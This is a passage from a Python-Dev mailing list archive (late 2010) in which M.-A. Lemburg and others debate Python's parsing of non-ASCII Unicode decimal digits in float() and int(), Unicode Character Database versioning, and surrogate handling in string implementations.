 for the individual digits. There are additional semantics associated
 with digit ordering (for any number) and decimal separators and
 exponential notation (for floating point numbers) and those vary by
 locale. We deliberately chose to make the builtin numeric parsers
 unaware of all of those things, and assuming that we can simply parse
 other digits as if they were their ASCII equivalents and otherwise
 assume a C locale seems questionable.

 Sure, and those additional semantics are locale dependent, even
 between ASCII-only locales. However, that does not apply to the
 basic building blocks, the decimal digits themselves.

 If the existing semantics can be adequately defined, documented and
 defended, then retaining them would be fine. However, the language
 reference needs to define the behaviour properly so that other
 implementations know what they need to support and what can be chalked
 up as being just an implementation accident of CPython. (As a point in
 the plus column, both decimal.Decimal and fractions.Fraction were able
 to handle the '١٢٣٤.٥٦' example in a manner consistent with the int
 and float handling)

 The support is built into the C API, so there's not really much
 surprise there.

 Regarding documentation, we'd just have to add that numbers may
 be made up of an Unicode code point in the category Nd.

 See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section
 4.6 for details

 
 Decimal digits form a large subcategory of numbers consisting of those
 digits that can be
 used to form decimal-radix numbers. They include script-specific
 digits, but exclude char-
 acters such as Roman numerals and Greek acrophonic numerals. (Note
 that1, 5  = 15 =
 fifteen, butI, V  = IV = four.) Decimal digits also exclude the
 compatibility subscript or
 superscript digits to prevent simplistic parsers from misinterpreting
 their values in context.
 

 int(), float() and long() (in Python2) are such simplistic
 parsers.
 
 Since you are the knowledgable advocate of the current behavior, perhaps
 you could open an issue and propose a doc patch, even if not .rst
 formatted.

Good suggestion. I tried to collect as much context as possible:

http://bugs.python.org/issue10610

I'll leave the rst-magic to someone else, but will certainly help
if you have more questions about the details.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-02 Thread M.-A. Lemburg
Eric Smith wrote:
 On 12/2/2010 5:43 PM, M.-A. Lemburg wrote:
 Eric Smith wrote:
 The current behavior should go nowhere; it is not useful. Something
 very
 similar to the current behavior (but done correctly) should go into the
 locale module.

 I agree with everything Martin says here. I think the basic premise is:
 you won't find strings in the wild that use non-ASCII digits but do
 use the ASCII dot as a decimal point. And that's what float() is looking
 for. (And that doesn't even begin to address what it expects for an
 exponent 'e'.)

 http://en.wikipedia.org/wiki/Decimal_mark

 In China, comma and space are used to mark digit groups because dot
 is used as decimal mark.
 
 Is that an ASCII dot? That page doesn't say.

Yes, but to be fair: I think that the page actually refers to the
use of the Arabic numeral format in China, rather than with their
own script symbols.

 Note that float() can also parse integers, it just returns them as
 floats :-)
 
 :)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 02 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/30/2010 10:05 AM, Alexander Belopolsky wrote:
 
 My general answers to the questions you have raised are as follows:
 
 1. Each new feature release should use the latest version of the UCD as
 of the first beta release (or perhaps a week or so before). New chars
 are new features and the beta period can be used to (hopefully) iron out
 any bugs introduced by a new UCD version.

The UCD is versioned just like Python is, so if the Unicode Consortium
decides to ship a 5.2.1 version of the UCD, we can add that to Python 2.7.x,
since Python 2.7 started out with 5.2.0.

 2. The language specification should not be UCD version specific. Martin
 pointed out that the definition of identifiers was intentionally written
 to not be, bu referring to 'current version' or some such. On the other
 hand, the UCD version used should be programatically discoverable,
 perhaps as an attribute of sys or str.

It already is and has been for while, e.g.

Python 2.5:
 import unicodedata
 unicodedata.unidata_version
'4.1.0'

 3.. The UCD should not change in bugfix releases. New chars are new
 features. Adding them in bugfix releases will introduce gratuitous
 imcompatibilities between releases. People who want the latest Unicode
 should either upgrade to the latest Python version or patch an older
 version (but not expect core support for any problems that creates).

See above. Patch level revisions of the UCD are fine for patch level
releases of Python, since those patch level revisions of the UCD fix
bugs just like we do in Python.

Note that each new UCD major.minor version is a new standard on its
own, so it's perfectly ok to stick with one such standard version
per Python version.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 01 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 Am 30.11.2010 21:24, schrieb Ben Finney:
 haiyang kang corn...@gmail.com writes:

   I think it is a little ugly to have code like this: num =
 float(一.一), expected result is: num = 1.1

 That's a straw man, though. The string need not be a literal in the
 program; it can be input to the program.

 num = float(input_from_the_external_world)

 Does that change your assessment of whether non-ASCII digits are used?
 
 I think the OP (haiyang kang) already indicated that he finds it quite
 unlikely that anybody would possibly want to enter that. You would need
 a number of key strokes to enter each individual ideograph, plus you
 have to press the keys for keyboard layout switching to enter the Latin
 decimal separator (which you normally wouldn't use along with the Han
 numerals).

That's a somewhat limited view, IMHO. Numbers are not always entered
using a computer keyboard, you have tool like cash registries, special
numeric keypads, scanners, OCR, etc. for external entry, and you also
have other programs producing such output, e.g. MS Office if configured
that way.

The argument with the decimal point doesn't work well either, since
it's obvious that float() and int() do not support localized input.

E.g. in Germany we write 3,141 instead of 3.141:

 float('3,141')
Traceback (most recent call last):
  File stdin, line 1, in module
ValueError: invalid literal for float(): 3,141

No surprise there. The localization of the input data, e.g. removal
of thousands separators and conversion of decimal marks to the dot,
have to be done by the application, just like you have to now for
German floating point number literals.

The locale module already has locale.atof() and locale.atoi() for
just this purpose.

FYI, here's a list of decimal digits supported by Python 2.7:

http://www.unicode.org/Public/5.2.0/ucd/extracted/DerivedNumericType.txt:

0030..0039; Decimal # Nd  [10] DIGIT ZERO..DIGIT NINE
0660..0669; Decimal # Nd  [10] ARABIC-INDIC DIGIT ZERO..ARABIC-INDIC DIGIT 
NINE
06F0..06F9; Decimal # Nd  [10] EXTENDED ARABIC-INDIC DIGIT ZERO..EXTENDED 
ARABIC-INDIC DIGIT NINE
07C0..07C9; Decimal # Nd  [10] NKO DIGIT ZERO..NKO DIGIT NINE
0966..096F; Decimal # Nd  [10] DEVANAGARI DIGIT ZERO..DEVANAGARI DIGIT NINE
09E6..09EF; Decimal # Nd  [10] BENGALI DIGIT ZERO..BENGALI DIGIT NINE
0A66..0A6F; Decimal # Nd  [10] GURMUKHI DIGIT ZERO..GURMUKHI DIGIT NINE
0AE6..0AEF; Decimal # Nd  [10] GUJARATI DIGIT ZERO..GUJARATI DIGIT NINE
0B66..0B6F; Decimal # Nd  [10] ORIYA DIGIT ZERO..ORIYA DIGIT NINE
0BE6..0BEF; Decimal # Nd  [10] TAMIL DIGIT ZERO..TAMIL DIGIT NINE
0C66..0C6F; Decimal # Nd  [10] TELUGU DIGIT ZERO..TELUGU DIGIT NINE
0CE6..0CEF; Decimal # Nd  [10] KANNADA DIGIT ZERO..KANNADA DIGIT NINE
0D66..0D6F; Decimal # Nd  [10] MALAYALAM DIGIT ZERO..MALAYALAM DIGIT NINE
0E50..0E59; Decimal # Nd  [10] THAI DIGIT ZERO..THAI DIGIT NINE
0ED0..0ED9; Decimal # Nd  [10] LAO DIGIT ZERO..LAO DIGIT NINE
0F20..0F29; Decimal # Nd  [10] TIBETAN DIGIT ZERO..TIBETAN DIGIT NINE
1040..1049; Decimal # Nd  [10] MYANMAR DIGIT ZERO..MYANMAR DIGIT NINE
1090..1099; Decimal # Nd  [10] MYANMAR SHAN DIGIT ZERO..MYANMAR SHAN DIGIT 
NINE
17E0..17E9; Decimal # Nd  [10] KHMER DIGIT ZERO..KHMER DIGIT NINE
1810..1819; Decimal # Nd  [10] MONGOLIAN DIGIT ZERO..MONGOLIAN DIGIT NINE
1946..194F; Decimal # Nd  [10] LIMBU DIGIT ZERO..LIMBU DIGIT NINE
19D0..19DA; Decimal # Nd  [11] NEW TAI LUE DIGIT ZERO..NEW TAI LUE THAM 
DIGIT ONE
1A80..1A89; Decimal # Nd  [10] TAI THAM HORA DIGIT ZERO..TAI THAM HORA 
DIGIT NINE
1A90..1A99; Decimal # Nd  [10] TAI THAM THAM DIGIT ZERO..TAI THAM THAM 
DIGIT NINE
1B50..1B59; Decimal # Nd  [10] BALINESE DIGIT ZERO..BALINESE DIGIT NINE
1BB0..1BB9; Decimal # Nd  [10] SUNDANESE DIGIT ZERO..SUNDANESE DIGIT NINE
1C40..1C49; Decimal # Nd  [10] LEPCHA DIGIT ZERO..LEPCHA DIGIT NINE
1C50..1C59; Decimal # Nd  [10] OL CHIKI DIGIT ZERO..OL CHIKI DIGIT NINE
A620..A629; Decimal # Nd  [10] VAI DIGIT ZERO..VAI DIGIT NINE
A8D0..A8D9; Decimal # Nd  [10] SAURASHTRA DIGIT ZERO..SAURASHTRA DIGIT NINE
A900..A909; Decimal # Nd  [10] KAYAH LI DIGIT ZERO..KAYAH LI DIGIT NINE
A9D0..A9D9; Decimal # Nd  [10] JAVANESE DIGIT ZERO..JAVANESE DIGIT NINE
AA50..AA59; Decimal # Nd  [10] CHAM DIGIT ZERO..CHAM DIGIT NINE
ABF0..ABF9; Decimal # Nd  [10] MEETEI MAYEK DIGIT ZERO..MEETEI MAYEK DIGIT 
NINE
FF10..FF19; Decimal # Nd  [10] FULLWIDTH DIGIT ZERO..FULLWIDTH DIGIT NINE
104A0..104A9  ; Decimal # Nd  [10] OSMANYA DIGIT ZERO..OSMANYA DIGIT NINE
1D7CE..1D7FF  ; Decimal # Nd  [50] MATHEMATICAL BOLD DIGIT ZERO..MATHEMATICAL 
MONOSPACE DIGIT NINE


The Chinese and Japanese ideographs are not supported because of the
way they are defined in the Unihan database. I'm currently
investigating how we could support them as well.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  

Re: [Python-Dev] Python and the Unicode Character Database

2010-12-01 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/30/2010 3:23 AM, Stephen J. Turnbull wrote:
 
 I see no reason not to make a similar promise for numeric literals.  I
 see no good reason to allow compatibility full-width Japanese ASCII
 numerals or Arabic cursive numerals in for i in range(...) for
 example.
 
 I do not think that anyone, at least not me, has argued for anything
 other than 0-9 digits (or 0-f for hex) in literals in program code. The
 only issue is whether non-programmer *users* should be able to use their
 native digits in applications in response to input prompts.

Me neither. This is solely about Python being able to parse numeric
input in the float(), int() and complex() constructors.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 01 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Sun, Nov 28, 2010 at 5:42 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 I don't see why the language spec should limit the wealth of number
 formats supported by float().

 
 The Language Spec (whatever it is) should not, but hopefully the
 Library Reference should.  If you follow
 http://docs.python.org/dev/py3k/library/functions.html#float link and
 the references therein, you'll end up with

... the language spec again :-)

 digit  ::=  0...9
 
 http://docs.python.org/dev/py3k/reference/lexical_analysis.html#grammar-token-digit

That's obviously a bug in the documentation, since the Python 2.7 docs
don't mention any such relationship to the language spec:

http://docs.python.org/library/functions.html#float

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 1:39 PM, Stephen J. Turnbull step...@xemacs.org 
 wrote:
 I agree that Python should make it easy for the programmer to get
 numerical values of native numeric strings, but it's not at all clear
 to me that there is any point to having float() recognize them by
 default.
 
 Indeed, as someone else suggested earlier in the thread, supporting
 non-ASCII digits sounds more like a job for the locale module than for
 the builtin types.
 
 Deprecating non-ASCII support in the latter, while ensuring it is
 properly supported in the former sounds like a better way forward than
 maintaining the status quo (starting in 3.3 though, with the first
 beta just around the corner, we don't want to be monkeying with this
 in 3.2)

Since when do we only support certain Unicode features in specific
locales ?

If we would go down that road, we would also have to disable other
Unicode features based on locale, e.g. whether to apply non-ASCII
case mappings, what to consider whitespace, etc.

We don't do that for a good reason: Unicode is supposed to be
universal and not limited to a single locale.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Mon, Nov 29, 2010 at 9:02 PM, M.-A. Lemburg m...@egenix.com wrote:
 If we would go down that road, we would also have to disable other
 Unicode features based on locale, e.g. whether to apply non-ASCII
 case mappings, what to consider whitespace, etc.

 We don't do that for a good reason: Unicode is supposed to be
 universal and not limited to a single locale.
 
 Because parsing numbers is about more than just the characters used
 for the individual digits. There are additional semantics associated
 with digit ordering (for any number) and decimal separators and
 exponential notation (for floating point numbers) and those vary by
 locale. We deliberately chose to make the builtin numeric parsers
 unaware of all of those things, and assuming that we can simply parse
 other digits as if they were their ASCII equivalents and otherwise
 assume a C locale seems questionable.

Sure, and those additional semantics are locale dependent, even
between ASCII-only locales. However, that does not apply to the
basic building blocks, the decimal digits themselves.

 If the existing semantics can be adequately defined, documented and
 defended, then retaining them would be fine. However, the language
 reference needs to define the behaviour properly so that other
 implementations know what they need to support and what can be chalked
 up as being just an implementation accident of CPython. (As a point in
 the plus column, both decimal.Decimal and fractions.Fraction were able
 to handle the '١٢٣٤.٥٦' example in a manner consistent with the int
 and float handling)

The support is built into the C API, so there's not really much
surprise there.

Regarding documentation, we'd just have to add that numbers may
be made up of an Unicode code point in the category Nd.

See http://www.unicode.org/versions/Unicode5.2.0/ch04.pdf, section
4.6 for details


Decimal digits form a large subcategory of numbers consisting of those digits 
that can be
used to form decimal-radix numbers. They include script-specific digits, but 
exclude char-
acters such as Roman numerals and Greek acrophonic numerals. (Note that 1, 5 
= 15 =
fifteen, but I, V = IV = four.) Decimal digits also exclude the compatibility 
subscript or
superscript digits to prevent simplistic parsers from misinterpreting their 
values in context.


int(), float() and long() (in Python2) are such simplistic
parsers.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-29 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Mon, Nov 29, 2010 at 2:22 AM, Martin v. Löwis mar...@v.loewis.de wrote:
 The former ensures that literals in code are always readable; the later
 allows users to enter numbers in their own number system. How could that
 be a bad thing?

 It's YAGNI, feature bloat. It gives the illusion of supporting something
 that actually isn't supported very well (namely, parsing local number
 strings). I claim that there is no meaningful application
 of this feature.

This is not about parsing local number strings, it's about
parsing number strings represented using different scripts -
besides en-US is a locale as well, ye know :-)

 Speaking of YAGNI, does anyone want to defend
 
 complex('١٢٣٤.٥٦j')
 1234.56j
 
 ?

Yes. The same arguments apply.

Just because ASCII-proponents may have a hard time reading such
literals, doesn't mean that script users have the same trouble.

 Especially given that we reject complex('1234.56i'):
 
 http://bugs.python.org/issue10562

We've had that discussion long before we had Unicode in Python.
The main reason was that 'i' looked to similar to 1 in a number
of fonts which is why it was rejected for Python source code.

However, I don't any reason why we shouldn't accept both i and
j for complex(), though, since the input to that constructor
doesn't have to originate in Python source code.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 29 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-28 Thread M.-A. Lemburg


Martin v. Löwis wrote:
 float('١٢٣٤.٥٦')
 1234.56
 
 I think it's a bug that this works. The definition of the float builtin says
 
 Convert a string or a number to floating point. If the argument is a
 string, it must contain a possibly signed decimal or floating point
 number, possibly embedded in whitespace. The argument may also be
 '[+|-]nan' or '[+|-]inf'.
 
 Now, one may wonder what precisely a possibly signed floating point
 number is, but most likely, this refers to
 
 floatnumber   ::=  pointfloat | exponentfloat
 pointfloat::=  [intpart] fraction | intpart .
 exponentfloat ::=  (intpart | pointfloat) exponent
 intpart   ::=  digit+
 fraction  ::=  . digit+
 exponent  ::=  (e | E) [+ | -] digit+
 digit  ::=  0...9

I don't see why the language spec should limit the wealth of number
formats supported by float().

It is not uncommon for Asians and other non-Latin script users to
use their own native script symbols for numbers. Just because these
digits may look strange to someone doesn't mean that they are
meaningless or should be discarded.

Please also remember that Python3 now allows Unicode names for
identifiers for much the same reasons.

Note that the support in float() (and the other numeric constructors)
to work with Unicode code points was explicitly added when Unicode
support was added to Python and has been available since Python 1.6.

It is not a bug by any definition of bug, even though the feature
may bug someone occasionally to go read up a bit on what else
the world has to offer other than Arabic numerals :-)

http://en.wikipedia.org/wiki/Numeral_system

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 28 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Python and the Unicode Character Database

2010-11-28 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 Two recently reported issues brought into light the fact that Python
 language definition is closely tied to character properties maintained
 by the Unicode Consortium. [1,2]  For example, when Python switches to
 Unicode 6.0.0 (planned for the upcoming 3.2 release), we will gain two
 additional characters that Python can use in identifiers. [3]
 
 With Python 3.1:
 
 exec('\u0CF1 = 1')
 Traceback (most recent call last):
  File stdin, line 1, in module
  File string, line 1
ೱ = 1
  ^
 SyntaxError: invalid character in identifier
 
 but with Python 3.2a4:
 
 exec('\u0CF1 = 1')
 eval('\u0CF1')
 1

Such changes are not new, but I agree that they should probably
be highlighted in the What's new in Python x.x.

 Of course, the likelihood is low that this change will affect any
 user, but the change in str.isspace() reported in [1] is likely to
 cause some trouble:
 
 Python 2.6.5:
 u'A\u200bB'.split()
 [u'A', u'B']
 
 Python 2.7:
 u'A\u200bB'.split()
 [u'A\u200bB']

That's a classical bug fix.

 While we have little choice but to follow UCD in defining
 str.isidentifier(), I think Python can promise users more stability in
 what it treats as space or as a digit in its builtins. 

Why should we divert from the work done by the Unicode Consortium ?
After all, most of their changes are in fact bug fixes as well.

 For example,
 I don't think that supporting
 
 float('١٢٣٤.٥٦')
 1234.56
 
 is more important than to assure users that once their program
 accepted some text as a number, they can assume that the text is
 ASCII.

Sorry, but I don't agree.

If ASCII numerals are an important aspect of an application, the
application should make sure that only those numerals are used
(e.g. by using a regular expression for checking).

In a Unicode world, not accepting non-Arabic numerals would be
a limitation, not a feature. Besides Python has had this support
since Python 1.6.

 [1] http://bugs.python.org/issue10567
 [2] http://bugs.python.org/issue10557
 [3] http://www.unicode.org/versions/Unicode6.0.0/#Database_Changes

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 28 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] len(chr(i)) = 2?

2010-11-25 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/24/2010 3:06 PM, Alexander Belopolsky wrote:
 
 Any non-trivial text processing is likely to be broken in presence of
 surrogates.  Producing them on input is just trading known issue for
 an unknown one.  Processing surrogate pairs in python code is hard.
 Software that has to support non-BMP characters will most likely be
 written for a wide build and contain subtle bugs when run under a
 narrow build.  Note that my latest proposal does not abolish
 surrogates outright.  Users who want them can still use something like
 surrogateescape  error handler for non-BMP characters.
 
 It seems to me that what you are asking for is an alternate, optional,
 utf-8-bmp codec that would raise an error, in either direction, for
 non-bmp chars. Then, as you suggest, if one is not prepared for
 surrogates, they are not allowed.

That would be a possibility as well... but I doubt that many users
are going to bother, since slicing surrogates is just as bad as
slicing combining code points and the latter are much more common in
real life and they do happen to mostly live in the BMP.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Nov 25 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] len(chr(i)) = 2?

2010-11-25 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Nov 24, 2010 at 9:17 PM, Stephen J. Turnbull step...@xemacs.org 
 wrote:
 ..
   I note that an opinion has been raised on this thread that
   if we want compressed internal representation for strings, we should
   use UTF-8.  I tend to agree, but UTF-8 has been repeatedly rejected as
   too hard to implement.  What makes UTF-16 easier than UTF-8?  Only the
   fact that you can ignore bugs longer, in my view.

 That's mostly true.  My guess is that we can probably ignore those
 bugs for as long as it takes someone to write the higher-level
 libraries that James suggests and MAL has actually proposed and
 started a PEP for.

 
 As far as I can tell, that PEP generated grand total of one comment in
 nine years.  This may or may not be indicative of how far away we are
 from seeing it implemented.  :-)

At the time it was too early for people to start thinking about
these issues. Actual use of Unicode really only started a few years
ago.

Since I didn't have a need for such an indexing module myself
(and didn't have much time to work on it anyway), I punted on the
idea.

If someone else wants to pick up the idea, I'd gladly help out with
the details.

 As far as UTF-8 vs. UCS-2/4 debate, I have an idea that may be even
 more far fetched.  Once upon a time, Python Unicode strings supported
 buffer protocol and would lazily fill an internal buffer with bytes in
 the default encoding.  In 3.x the default encoding has been fixed as
 UTF-8, buffer protocol support was removed from strings, but the
 internal buffer caching (now UTF-8) encoded representation remained.
 Maybe we can now implement defenc logic in reverse.  Recall that
 strings are stored as UCS-2/4 sequences, but once buffer is requested
 in 2.x Python code or char* is obtained via
 _PyUnicode_AsStringAndSize() at the C level in 3.x, an internal buffer
 is filled with UTF-8 bytes and  defenc is set to point to that buffer.

The original idea was for that buffer to go away once we moved
to Unicode for strings. Reality has shown that we still need
to stick the buffer, though, since the UTF-8 representation
of Unicode objects is used a lot.

   So the idea is for strings to store their data as UTF-8 buffer
 pointed by defenc upon construction.  If an application uses string
 indexing, UTF-8 only strings will lazily fill their UCS-2/4 buffer.
 Proper, Unicode-aware algorithms such as grapheme, word or line
 iteration or simple operations such as concatenation, search or
 substitution would operate directly on defenc buffers.  Presumably
 over time fewer and fewer applications would use code unit indexing
 that require UCS-2/4 buffer and eventually Python strings can stop
 supporting indexing altogether just like they stopped supporting the
 buffer protocol in 3.x.

I don't follow you: how would UTF-8, which has even more issues
with variable length representation of code points, make something
easier compared to UTF-16, which has far fewer such issues and
then only for non-BMP code points ?

Please note that we can only provide one way of string indexing
in Python using the standard s[1] notation and since we don't
want that operation to be fast and no more than O(1), using the
code units as items is the only reasonable way to implement it.

With an indexing module, we could then let applications work
based on higher level indexing schemes such as complete code
points (skipping surrogates), combined code points, graphemes
(ignoring e.g. most control code points and zero width
code points), words (with some customizations as to where to
break words, which will likely have to be language dependent),
lines (which can be complicated for scripts that use columns
instead ;-)), paragraphs, etc.

It would also help to add transparent indexing for right-to-left
scripts and text that uses both left-to-right and right-to-left
text (BIDI).

However, in order for these indexing methods to actually work,
they will need to return references to the code units, so we cannot
just drop that access method.

* Back on the surrogates topic:

In any case, I think this discussion is losing its grip on reality.

By far, most strings you find in actual applications don't use
surrogates at all, so the problem is being exaggerated.

If you need to be careful about surrogates for some reason, I think
a single new method .hassurrogates() on string objects would
go a long way in making detection and adding special-casing for
these a lot easier.

If adding support for surrogates doesn't make sense (e.g. in the
case of the formatting methods), then we simply punt on that and
leave such handling to other tools.

* Regarding preventing surrogates from entering the Python
